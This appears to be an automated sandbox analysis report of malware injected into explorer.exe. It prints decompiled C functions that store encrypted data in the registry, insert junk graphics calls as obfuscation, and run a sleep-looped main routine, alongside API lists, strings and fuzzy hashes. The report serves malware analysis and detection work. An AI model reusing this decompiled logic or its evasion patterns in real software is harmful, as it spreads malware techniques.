Opcode Fuzzy Hash: 8e99e41177282bb29194e0d8c55b674a6e1fb8f4730995250ba9b9a2613a21ad
Instruction Fuzzy Hash: F5215C7590010CFFDF109FA5ED84CEEBBB9EB88751B204265FA11A2111E6318A15EB21

Uniqueness

Uniqueness Score: -1.00%

Function 00F5AA66, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5AA66(intOrPtr* __ebx, void* _a4, char* _a8, char* _a12) {
				int _v8;
				void* _v12;
				int _v16;
				char* _t45;

				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t45 = 0; // executed
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_v12) == 0) {
					_v8 = 0;
					if(RegQueryValueExA(_v12, _a12, 0,  &_v16, 0,  &_v8) == 0) {
						_t45 = E00F5AC58(_v8 + 1);
						if(_t45 != 0 && RegQueryValueExA(_v12, _a12, 0,  &_v16, _t45,  &_v8) == 0 && __ebx != 0) {
							 *((intOrPtr*)(__ebx)) = _v8;
						}
					}
					if(_v12 != 0) {
						RegCloseKey(_v12);
					}
					return _t45;
				}
				return 0;
			}

0x00f5aa82
0x00f5aa88
0x00f5aa8b
0x00f5aa8e
0x00f5aa95
0x00f5aaad
0x00f5aab8
0x00f5aac4
0x00f5aac9
0x00f5aaee
0x00f5aaee
0x00f5aac9
0x00f5aaf3
0x00f5aafd
0x00f5aafd
0x00000000
0x00f5ab00
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(00000001,00000000,00000000,00020019,00000001,?,0547F9A8,00000000,00000001), ref: 00F5AA90
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?), ref: 00F5AAB3
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?), ref: 00F5AAE0
RegCloseKey.KERNELBASE(?), ref: 00F5AAFD

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: f8ba77f0bb5749912863fc2bd5f9ad2025b7ca1db1d6f07f3dc6fdfe1a983b82
Instruction ID: d39a07c2b41fca7439ad5b412501d44458a45c07736ea2fce1390a041e0b3574
Opcode Fuzzy Hash: f8ba77f0bb5749912863fc2bd5f9ad2025b7ca1db1d6f07f3dc6fdfe1a983b82
Instruction Fuzzy Hash: 4D212775A00218FFCF11CFA9DD84DEEBFB8EB48751B144091F905E2111E230DA54EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F57335, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00F57335(signed int __edx, intOrPtr* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v80;
				intOrPtr _v84;
				void* __edi;
				void* __esi;
				intOrPtr _t102;
				signed int _t105;
				signed int _t111;
				char _t128;
				intOrPtr _t144;
				void* _t161;
				void* _t198;
				void* _t199;

				_t188 = __edx;
				_v12 = _v12 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v24 = E00F56546(__edx);
				while(0 != 0) {
				}
				_t102 =  *0xf89720; // 0xf90000
				_t105 = E00F61F51(1, _v24, _t102 + 0xb0, 0); // executed
				_t199 = _t198 + 0xc;
				_v8 = _t105;
				if(_v8 != 0) {
					if(E00F619DF(_t161, _v8) >= 0) {
						if( *(_v8 + 0x43c) != 0) {
							_t111 = E00F5AC58( *(_v8 + 0x43c) * 0x18);
							_pop(_t162);
							_v28 = _t111;
							if(_v28 != 0) {
								_v16 = _v16 & 0x00000000;
								while(1) {
									_t162 = _v16;
									if(_v16 >=  *(_v8 + 0x43c)) {
										break;
									}
									_t128 = E00F5B3BC( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x444)) + _v16 * 4)), 0x3b, 0,  &_v36);
									_t199 = _t199 + 0xc;
									_v40 = _t128;
									if(_v40 == 0 || _v36 != 4) {
										while(0 != 0) {
										}
										goto L20;
									} else {
										 *((intOrPtr*)(_v28 + _v16 * 0x18)) = E00F5CE8A( *_v40);
										 *((intOrPtr*)(_v28 + 4 + _v16 * 0x18)) = E00F5CE8A( *((intOrPtr*)(_v40 + 4)));
										 *((intOrPtr*)(_v28 + 8 + _v16 * 0x18)) = E00F5CE8A( *((intOrPtr*)(_v40 + 8)));
										 *((intOrPtr*)(_v28 + 0x10 + _v16 * 0x18)) = E00F5ACD6( *((intOrPtr*)(_v40 + 0xc)));
										_t144 = E00F5AC29( *((intOrPtr*)(_v40 + 0xc)), E00F5ACD6( *((intOrPtr*)(_v40 + 0xc))) + 1);
										_t188 = _v28;
										 *((intOrPtr*)(_v28 + 0xc + _v16 * 0x18)) = _t144;
										BitBlt(0, 0x47, 0x39, 0x2b, 0x45, 0, 0x43, 0x54, 0x57);
										if( *((intOrPtr*)(_v28 + 0xc + _v16 * 0x18)) != 0) {
											 *_a4 =  *_a4 + 1;
											E00F5B78C( &_v36,  &_v40);
											goto L20;
										} else {
											while(0 != 0) {
											}
											E00F5B78C( &_v36,  &_v40);
											L20:
											_v16 = _v16 + 1;
											continue;
										}
									}
									break;
								}
								if( *_a4 != 0) {
									while(0 != 0) {
									}
									_v44 = 0x16;
									_v84 = E00F5ABE5( &_v80, "BaW TSldRhGVlOl9M8iM 4Twc.oW.Ix,M,bhBUflFD.fIh KL T4s0XFOFF1EQ9D34BmjWzJQ5zj7wMO.jdCi1 RVk6ov6iMVmBGLQ4JEgOhgfZ5mIwvIvfl .sJjUYGL,rEILF.YFk L5XaSvJoZhFomPQ9JiumanT7iYeS7F54mnKarAESUMuws,qVnqBwzF3JFaKXl1Jf,dBUnD8Qg axoT3.fR,oLlMvd59JQhK,SuYypfUTg82UO1iH.JnFMNAGE  SBP5i z3yVyduuS3uY.bvf1lGPEOOyHtwtB0NJcwvy.PZXmmuYb0 NdfJbGnAsDtNPgu0lrA7Fm,CEYeJ74lzcePOn0hOonCNAVe9N3DQUooVe.tfULz xkUzLrQFp03BKeHaADE0OrV5EvcZ2 Zzpv2aX,s D,3Fg0Ses0pbCN5naP971 BRLGI8Yw DrXq26,mgBMDrSzdR7bmZRu5n5PxyGqgCXSZ9rZJP4acJ91VDpNcs.7bEDeW0iyp KVfXCeAbKirilRD2cwc6oZbpQX0Ra48v dgvLZ5g6HPxOgXdA5OVQRm4p5hq,QD mK rOic6G8K gZIjmh9L0K3f44bmFrSOJdK,cegw0l2w1Ey  w 15.sqazCQFAnh4 xrp2Cu Svywbk3lJkvfNwBK8oq6VbG.. KzeBhInkb3k,j5K9b4RGK7,raRXp5IvlooGApw d IW8DwTB,3Ii GeOqsLXq .1qRqAMkPm,GcxFAvMBI0 Tu9qrT uYQZKws.Tjmc15hYFWjRiZNiuIDjdk2NnHKPceKN09Eps0ON.0P2Ns74Q7V8AslgSnYtECfyWIIcS.uZ7U4IlrgWU71Z4DUZEGku GUc.,Ujc.dN M egzuhB.xe1kJjOg5 Jndr ujszf1hsO8, qM26Z SVPl0KmJn7G1eVw dy GSBzPHUmIy0YjwvlHkDPm C1 nOK6f,rbZ3nXKCp6N23xSr x9yA6LjoP2 1dKPzJ0qxy8Hnhjj6J 73 0I74ikwzzxdwLXG6h.cOj.YRZEOUS ,UrDVNgAcD68Et CSPQtXFU6cBJr59NRHALgGY xOLPdg4Em7Q0IGwJd QuokbD,LtUT.cwmyL5f Ut6KxuBwNZLHSZ  b2iMGPti,8Elerl UO7rin.5iia8ge.RN8QcZu9BVQoatj4bKT71uat EfQAUG5dY5uTPl1L3p1KYyUd7 xOha7qoG1s7,5y,DRHqr5T2RwhV4.neSxzWOy YqYYc3,Ai1uT9TRjVDKV.NVowTP3mSTjmhB9gN1bQNNNqT0pO3MvWEPztK Ksh,MPjSjABziQpKf4tYPCELs DC7,ngko,9ASbODfz,pXgdo27RIoZqkchzdHyB,uPCVM8aHLW LcH9.S5zFMgrCYMrz3zrOAhRxTKeKIUNifQK2eTzaXEnQf9RCOglnN c.WahwjUBzuq,JltxHUbw3Eh 5TtJ.ZowzKHpL1RqDZfBJxIrr85RAAmFS.Uv2T2Uhm I yLcqBCHE.5cauzGIkzJaxKI6zDvpRzhSKvevLjKohLda XLFhoGTNnL0oe r.BLKw7pJ3OgUzldwZ4d9TSfXrxxFgjosnmHG9EFr5g IXfZx,Xc71heasqzF3K6RT6YL2fQRZ0Jb6cDBHRi5,dGAHIEV436PcR c2iDSZHQVFZ QGUs.zQOiMvyE5fXv9LiHjJ,mCIMd3EAy9sA4,Bgy Szh9WmOwMt Ecl9mdZD8 OYqukiqj,2thj0f5LTezkQiu8Tm6cVTiF 1GxLwYwPGUiVo3o7W9 MsL E1Fk8u2RijJx4wLp LHCFEdfRPiOxTlPwSZtMbC3MEDqP X8 N3Hd6y0GF7YbILtVzBKUNDLpwIgP I", _v44);
								} else {
									E00F5AB81( &_v28, 0);
									_pop(_t162);
									while(0 != 0) {
									}
								}
							} else {
								while(0 != 0) {
								}
								_v12 = 0xfffffffd;
							}
						} else {
							while(0 != 0) {
							}
							_v12 = 0xfffffffe;
						}
					} else {
						while(0 != 0) {
						}
						ArcTo(0, 0x5d, 8, 0x43, 0x5b, 0x25, 0x25, 0x14, 0x63);
						_v12 = 0xfffffffe;
					}
				} else {
					while(0 != 0) {
					}
					_v12 = _v12 & 0x00000000;
				}
				if(_a8 != 0) {
					_t162 = _v12;
					 *_a8 = _v12;
				}
				if(_v8 != 0) {
					E00F61CD2(_t162, _t188,  &_v8);
				}
				E00F5AB81( &_v24, 0xfffffffe);
				return _v28;
			}

0x00f57335
0x00f5733d
0x00f57341
0x00f57345
0x00f57349
0x00f5734d
0x00f57351
0x00f57355
0x00f5735e
0x00f57361
0x00f57365
0x00f57369
0x00f57379
0x00f5737e
0x00f57381
0x00f57388
0x00f573a8
0x00f573e3
0x00f57409
0x00f5740e
0x00f5740f
0x00f57416
0x00f5742f
0x00f5743c
0x00f5743f
0x00f57448
0x00000000
0x00000000
0x00f57465
0x00f5746a
0x00f5746d
0x00f57474
0x00f5747c
0x00f57480
0x00000000
0x00f57484
0x00f57497
0x00f574ae
0x00f574c6
0x00f574df
0x00f574f7
0x00f57504
0x00f57507
0x00f5751d
0x00f57531
0x00f57554
0x00f5755d
0x00000000
0x00f57533
0x00f57533
0x00f57537
0x00f57540
0x00f57435
0x00f57439
0x00000000
0x00f57439
0x00f57531
0x00000000
0x00f57474
0x00f5756e
0x00f57585
0x00f57589
0x00f5758b
0x00f575a6
0x00f57570
0x00f57576
0x00f5757c
0x00f5757d
0x00f57581
0x00f57583
0x00f57418
0x00f57418
0x00f5741c
0x00f5741e
0x00f5741e
0x00f573e5
0x00f573e5
0x00f573e9
0x00f573eb
0x00f573eb
0x00f573aa
0x00f573aa
0x00f573ae
0x00f573c2
0x00f573c8
0x00f573c8
0x00f5738a
0x00f5738a
0x00f5738e
0x00f57390
0x00f57390
0x00f575ad
0x00f575b2
0x00f575b5
0x00f575b5
0x00f575bb
0x00f575c0
0x00f575c0
0x00f575cb
0x00f575d8

Strings

BaW TSldRhGVlOl9M8iM 4Twc.oW.Ix,M,bhBUflFD.fIh KL T4s0XFOFF1EQ9D34BmjWzJQ5zj7wMO.jdCi1 RVk6ov6iMVmBGLQ4JEgOhgfZ5mIwvIvfl .sJjUYGL,rEILF.YFk L5XaSvJoZhFomPQ9JiumanT7iYeS7F54mnKarAESUMuws,qVnqBwzF3JFaKXl1Jf,dBUnD8Qg axoT3.fR,oLlMvd59JQhK,SuYypfUTg82UO1iH.JnFMNAG, xrefs: 00F57595

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFileMeta
String ID: BaW TSldRhGVlOl9M8iM 4Twc.oW.Ix,M,bhBUflFD.fIh KL T4s0XFOFF1EQ9D34BmjWzJQ5zj7wMO.jdCi1 RVk6ov6iMVmBGLQ4JEgOhgfZ5mIwvIvfl .sJjUYGL,rEILF.YFk L5XaSvJoZhFomPQ9JiumanT7iYeS7F54mnKarAESUMuws,qVnqBwzF3JFaKXl1Jf,dBUnD8Qg axoT3.fR,oLlMvd59JQhK,SuYypfUTg82UO1iH.JnFMNAG
API String ID: 2005549212-619981873
Opcode ID: 136bc7b2a73622b7e5f4abb59954ba64e4d2cd33158b62a6fcb1410fc837d208
Instruction ID: 08a6376fa17752fd1e866f9cc2d9bdd0c7f9c618aeff8f909bef9a4ece6cbfae
Opcode Fuzzy Hash: 136bc7b2a73622b7e5f4abb59954ba64e4d2cd33158b62a6fcb1410fc837d208
Instruction Fuzzy Hash: 51919171E04308DFDB14EFA4E845BADB7B4EB04322F244169EA05BB2D1D7349E49EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C513, Relevance: 4.6, APIs: 3, Instructions: 142
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00F5C513(signed int __eax, char* __ecx, void* __edx, void* __fp0, intOrPtr _a4, void* _a8, char _a12) {
				char* _v12;
				char* _v16;
				char _v20;
				int _v24;
				intOrPtr _v28;
				char _v48;
				char _v60;
				char _v328;
				char _v2832;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t49;
				char* _t57;
				void* _t67;
				long _t74;
				long _t83;
				long _t86;
				void* _t91;
				signed int _t92;
				char* _t93;
				char* _t105;
				char* _t107;
				intOrPtr _t108;

				_t48 = __eax;
				_t92 = __eax;
				_t107 = __ecx;
				if(_a8 == 0 || __eax == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t114 = __ecx;
					if(__ecx == 0) {
						goto L13;
					}
					_v12 = __ecx;
					_v28 = E00F61785( *((intOrPtr*)(_a4 + 0x108)),  &_v12, 4);
					E00F6D8CE( *((intOrPtr*)(_a4 + 0x108)) + _t107,  &_v2832);
					_t57 = E00F6D918(_t114, __fp0,  &_v2832, 0, 0x64);
					_v16 = _t57;
					_v24 = _t57 + _t92 + 6;
					_t105 = E00F5AC58(_t57 + _t92 + 6);
					_v12 = _t105;
					if(_t105 != 0) {
						 *_t105 = _a12;
						_t16 = _t105 + 6; // 0x6
						 *((char*)(_t105 + 1)) = 1;
						 *((intOrPtr*)(_t105 + 2)) = _t92;
						E00F5ABE5(_t16, _a8, _t92);
						_t21 = _t92 + 6; // 0x6
						E00F6D988( &_v2832, _t105 + _t21, _v16);
						_v20 = _t107;
						_t108 = _a4;
						_v16 =  *((intOrPtr*)(_t108 + 0x108));
						_t93 =  &_v48;
						_t67 = 8;
						E00F635ED(_t67, _t93,  &_v20);
						_push( &_v328);
						_push(0x14);
						_push(_t93);
						E00F62F6F( &_v20);
						_push( &_v328);
						_push(_v24);
						_push(_t105);
						E00F62FE1();
						_t74 = E00F5CBD4(_t108);
						_v16 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							E00F5CF36(_v28,  &_v60, 0x10);
							_t83 = RegOpenKeyExA( *(_t108 + 0x10c), _v16, 0, 2,  &_a8);
							__eflags = _t83;
							if(_t83 == 0) {
								_t86 = RegSetValueExA(_a8,  &_v60, 0, 3, _v12, _v24);
								__eflags = _t86;
								if(_t86 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a8);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E00F5AB81( &_v16, 0xffffffff);
						}
						E00F5AB81( &_v12, 0);
						return 0;
					}
					_t91 = 0xfffffffe;
					return _t91;
				}
			}

0x00f5c513
0x00f5c523
0x00f5c525
0x00f5c527
0x00f5c692
0x00f5c692
0x00f5c692
0x00000000
0x00f5c535
0x00f5c535
0x00f5c537
0x00000000
0x00000000
0x00f5c54e
0x00f5c556
0x00f5c563
0x00f5c573
0x00f5c578
0x00f5c580
0x00f5c588
0x00f5c58d
0x00f5c592
0x00f5c59f
0x00f5c5a5
0x00f5c5a8
0x00f5c5ad
0x00f5c5b0
0x00f5c5b8
0x00f5c5c4
0x00f5c5c9
0x00f5c5cc
0x00f5c5d5
0x00f5c5da
0x00f5c5dd
0x00f5c5e1
0x00f5c5ec
0x00f5c5ef
0x00f5c5f1
0x00f5c5f2
0x00f5c5fd
0x00f5c5fe
0x00f5c601
0x00f5c602
0x00f5c60c
0x00f5c611
0x00f5c614
0x00f5c616
0x00f5c620
0x00f5c63d
0x00f5c640
0x00f5c642
0x00f5c65f
0x00f5c662
0x00f5c664
0x00f5c666
0x00f5c668
0x00f5c668
0x00f5c671
0x00f5c644
0x00f5c644
0x00f5c646
0x00f5c646
0x00f5c67a
0x00f5c680
0x00f5c687
0x00000000
0x00f5c68e
0x00f5c596
0x00000000
0x00f5c596

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 00F5C63D

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapOpen
String ID:
API String ID: 4287083251-0
Opcode ID: b9bb07f33f677f3c854bd0e1a80ab7b2ba0df44c8e6a4fd8e758ab2f87400d67
Instruction ID: 81429f53fbb91d0242d47c12539b9c4c79b6d2513962edd9e977a034fd8d0f40
Opcode Fuzzy Hash: b9bb07f33f677f3c854bd0e1a80ab7b2ba0df44c8e6a4fd8e758ab2f87400d67
Instruction Fuzzy Hash: 0B416371904209BFDF11DFA4DC81FEEBBB8EF04324F144266FA15A7291D7749A489B90

Uniqueness

Uniqueness Score: -1.00%

Function 00F6C99C, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101
sleepCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F6C99C() {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t25;
				char _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t32;
				void* _t37;
				char* _t38;
				char _t43;
				void* _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				char* _t60;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;

				_t25 =  *0xf896fc; // 0x547fac0
				_t26 = E00F5AC58( *((intOrPtr*)(_t25 + 4))); // executed
				_pop(_t52);
				_v12 = _t26;
				if(_t26 != 0) {
					_t28 =  *0xf896fc; // 0x547fac0
					if( *((intOrPtr*)(_t28 + 4)) > 0x400) {
						E00F5ABE5(_v12,  *_t28, 0x400);
						_v8 = _v8 & 0x00000000;
						_t37 = E00F62CCE(_t52, 0x336);
						_t55 =  *0xf89720; // 0xf90000
						_t66 = _t65 + 0x10;
						_t60 = L"SysWOW64";
						if( *((intOrPtr*)(_t55 + 0xa8)) == 0) {
							_t60 = L"System32";
						}
						_push(0);
						_push(_t37);
						_t38 = "\\";
						_push(_t38);
						_push(_t60);
						_push(_t38);
						_v16 = E00F5B60A(_t55 + 0x1020);
						E00F5BA86( &_v16);
						_t43 = E00F5D103(_v16,  &_v8);
						_t67 = _t66 + 0x24;
						_v20 = _t43;
						if(_t43 != 0 && _v8 > 0x400) {
							_t57 =  *0xf896fc; // 0x547fac0
							_t58 =  *((intOrPtr*)(_t57 + 4));
							if(_v8 <  *((intOrPtr*)(_t57 + 4))) {
								_t58 = _v8;
							}
							E00F5ABE5(_v12 + 0x400, _t43 + 0x400, _t58 + 0xfffffc00);
							_t67 = _t67 + 0xc;
						}
						E00F5AB81( &_v20, _v8);
						E00F5AB81( &_v16, 0xfffffffe);
						_t65 = _t67 + 0x10;
					}
					_t63 = 0;
					while(1) {
						_t29 =  *0xf896fc; // 0x547fac0
						_t30 =  *0xf89720; // 0xf90000
						_t32 = E00F5D25A(_t30 + 0x228, _v12,  *((intOrPtr*)(_t29 + 4))); // executed
						_t65 = _t65 + 0xc;
						if(_t32 >= 0) {
							break;
						}
						Sleep(1);
						_t63 = _t63 + 1;
						if(_t63 < 0x2710) {
							continue;
						}
						break;
					}
					E00F5AB81( &_v12, 0);
				}
				return 0;
			}

0x00f6c9a2
0x00f6c9aa
0x00f6c9af
0x00f6c9b0
0x00f6c9b5
0x00f6c9bb
0x00f6c9c9
0x00f6c9d5
0x00f6c9da
0x00f6c9e3
0x00f6c9e8
0x00f6c9ee
0x00f6c9f8
0x00f6c9fd
0x00f6c9ff
0x00f6c9ff
0x00f6ca04
0x00f6ca06
0x00f6ca07
0x00f6ca0c
0x00f6ca0d
0x00f6ca0e
0x00f6ca1b
0x00f6ca22
0x00f6ca2e
0x00f6ca33
0x00f6ca36
0x00f6ca3b
0x00f6ca42
0x00f6ca48
0x00f6ca4e
0x00f6ca50
0x00f6ca50
0x00f6ca69
0x00f6ca6e
0x00f6ca6e
0x00f6ca78
0x00f6ca83
0x00f6ca88
0x00f6ca88
0x00f6ca8b
0x00f6ca8d
0x00f6ca8d
0x00f6ca95
0x00f6caa3
0x00f6caa8
0x00f6caad
0x00000000
0x00000000
0x00f6cab6
0x00f6cabc
0x00f6cac3
0x00000000
0x00000000
0x00000000
0x00f6cac3
0x00f6cacb
0x00f6cad2
0x00f6cad6

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

Sleep.KERNELBASE(00000001,?,?,0547FAC0,?,?,?,00F6CD29,?,?,?,00000000), ref: 00F6CAB6

Strings

SysWOW64, xrefs: 00F6C9F8
System32, xrefs: 00F6C9FF, 00F6CA0D

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID: SysWOW64$System32
API String ID: 4201116106-2024443423
Opcode ID: 8d8463f8cf8d4e9ce04c7955bed5ad9f58ff26d6d41655e3580b496eaea8f07b
Instruction ID: 251d91903cc689cf97975b644d90ecbb732481a1db77b271b2a420e41398f69b
Opcode Fuzzy Hash: 8d8463f8cf8d4e9ce04c7955bed5ad9f58ff26d6d41655e3580b496eaea8f07b
Instruction Fuzzy Hash: 6A31B2B1D00109BBDB10EBA4DC46BBE77B9EB04315F148265FA44E7292D778DA10E790

Uniqueness

Uniqueness Score: -1.00%

Function 00F54F42, Relevance: 4.6, APIs: 3, Instructions: 90
sleepCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00F54F42(void* __ecx, intOrPtr __edx) {
				void* _t3;
				intOrPtr _t6;
				intOrPtr _t9;
				intOrPtr _t11;
				void* _t26;
				void* _t33;
				void* _t34;

				_t35 = __edx;
				_t3 = E00F5C373(__edx, 0x3b); // executed
				if(_t3 != 0xffffffff || E00F54BFE() == 0) {
					E00F5CEF9(_t35, 0xf897f0);
					_push( *0xf897f4);
					_push( *0xf897f0);
					_t33 = 0x37; // executed
					E00F5C403(_t33);
					_t6 =  *0xf89720; // 0xf90000
					_push(0);
					_push( *((intOrPtr*)(_t6 + 0x1640)));
					_t34 = 0x3a; // executed
					E00F5C403(_t34); // executed
					 *0xf8971c = E00F5F138(0xf86838, 0x54, 0x377); // executed
					_t9 = E00F5F138(0xf86890, 4, 0x99e); // executed
					 *0xf89734 = _t9; // executed
					E00F607FB(); // executed
					_t11 = E00F5506F(__eflags);
					__eflags = _t11;
					if(_t11 != 0) {
						E00F5C0D0(); // executed
						E00F5947E(_t34); // executed
						E00F5C179(_t34, E00F55133, 0, 0, 0); // executed
						E00F550E0(); // executed
						E00F552E5(_t35, __eflags); // executed
						E00F53FEB(_t35); // executed
						E00F575D9(); // executed
						while(1) {
							__eflags =  *0xf89820; // 0x0
							if(__eflags != 0) {
								break;
							}
							E00F5CEF9(_t35, 0xf89760);
							_pop(_t34); // executed
							E00F54089(); // executed
							IsValidCodePage(0x32);
							Sleep(0xfa0);
						}
						E00F576C5();
						E00F5C053(_t34);
						E00F55438();
						_t26 = 0;
						__eflags = 0;
					} else {
						Arc(0, 0x20, 0x41, 0x10, 0xd, 0x55, 0x27, 0x31, 0x5c);
						goto L2;
					}
				} else {
					L2:
					_t26 = 1;
				}
				return _t26;
			}

0x00f54f42
0x00f54f4c
0x00f54f55
0x00f54f6d
0x00f54f73
0x00f54f79
0x00f54f81
0x00f54f82
0x00f54f87
0x00f54f8e
0x00f54f8f
0x00f54f97
0x00f54f98
0x00f54fbd
0x00f54fc2
0x00f54fca
0x00f54fcf
0x00f54fd4
0x00f54fd9
0x00f54fdb
0x00f54ff9
0x00f54ffe
0x00f5500b
0x00f55013
0x00f55018
0x00f5501d
0x00f55022
0x00f55051
0x00f55051
0x00f55057
0x00000000
0x00000000
0x00f5502e
0x00f55033
0x00f55034
0x00f5503b
0x00f5504b
0x00f5504b
0x00f55059
0x00f5505e
0x00f55063
0x00f55068
0x00f55068
0x00f54fdd
0x00f54fee
0x00000000
0x00f54fee
0x00f54f60
0x00f54f60
0x00f54f62
0x00f54f62
0x00f5506e

APIs

Arc.GDI32(00000000,00000020,00000041,00000010,0000000D,00000055,00000027,00000031,0000005C), ref: 00F54FEE

Part of subcall function 00F54BFE: IsValidCodePage.KERNEL32(0000003E,00000000,0000000C), ref: 00F54C99

Part of subcall function 00F5CEF9: GetSystemTimeAsFileTime.KERNEL32(?,?,00F54CCA,00000000), ref: 00F5CF03
Part of subcall function 00F5CEF9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5CF23

IsValidCodePage.KERNELBASE(00000032), ref: 00F5503B
Sleep.KERNELBASE(00000FA0), ref: 00F5504B

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CodePageTimeValid$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4078929352-0
Opcode ID: 4bbb2603640ddc5c4d132903e5b238d2c6cb87d0594f29669b3483b0eb4f09ff
Instruction ID: 67a1b379b8141ca8cf8d58de625b3401ac9209b3e202763bd98bf74bee327967
Opcode Fuzzy Hash: 4bbb2603640ddc5c4d132903e5b238d2c6cb87d0594f29669b3483b0eb4f09ff
Instruction Fuzzy Hash: 4A210B71A98704BAE52077B46C0BFBE36489F04B63F140014FF46680D3DED89188B6E3

Uniqueness

Uniqueness Score: -1.00%

Function 00F546F4, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00F546F4(void* __ebx, void* __edx, void* __eflags, void* __fp0) {
				char _v44;
				char _v328;
				void* __esi;
				signed int _t7;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t25;
				void* _t30;
				void* _t31;
				void* _t34;
				void* _t35;
				void* _t40;

				_t40 = __eflags;
				_t30 = __edx;
				_t7 =  *0xf89720; // 0xf90000
				E00F6D1ED(_t7,  *((intOrPtr*)(_t7 + 0x224))); // executed
				E00F5ABD0();
				E00F5B749();
				 *0xf897ec = 0;
				 *0xf89844 = 0;
				 *0xf89840 = 0;
				E00F544E2();
				E00F5F33E();
				__imp__GetCPInfoExA(0x24, 0x19,  &_v328, _t31, _t34);
				_t14 =  *0xf89720; // 0xf90000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xf89720; // 0xf90000
				_t35 =  &_v44;
				E00F5CDBD(_t35, _t40,  *((intOrPtr*)(_t15 + 0xac)) + 7);
				E00F5D0BD(_t35); // executed
				memset(_t35, 0, 0x27);
				E00F5460B(__ebx, _t30, _t35, __fp0); // executed
				Arc(0, 7, 0x1c, 0x17, 0x51, 9, 5, 0x5b, 0x22);
				_t25 =  *0xf89740; // 0x547f6c8
				 *((intOrPtr*)(_t25 + 0xdc))(0);
				return 0;
			}

0x00f546f4
0x00f546f4
0x00f546f7
0x00f5470a
0x00f54710
0x00f54715
0x00f5471c
0x00f54722
0x00f54728
0x00f5472e
0x00f54733
0x00f54743
0x00f54749
0x00f5474e
0x00f54758
0x00f54767
0x00f5476a
0x00f54772
0x00f5477d
0x00f54785
0x00f5479b
0x00f547a1
0x00f547a7
0x00f547b2

APIs

Part of subcall function 00F5ABD0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00F548DB), ref: 00F5ABD9

Part of subcall function 00F5F33E: GetCurrentProcess.KERNEL32(00000000,?,00F54738), ref: 00F5F346
Part of subcall function 00F5F33E: GetModuleFileNameW.KERNEL32(00000000,00F91644,00000000,?,00F54738), ref: 00F5F368
Part of subcall function 00F5F33E: memset.MSVCRT ref: 00F5F3A1
Part of subcall function 00F5F33E: GetVersionExA.KERNEL32(00F90000,00F54738), ref: 00F5F3AC
Part of subcall function 00F5F33E: GetCurrentProcessId.KERNEL32 ref: 00F5F3B2

GetCPInfoExA.KERNEL32(00000024,00000019,?), ref: 00F54743
memset.MSVCRT ref: 00F5477D
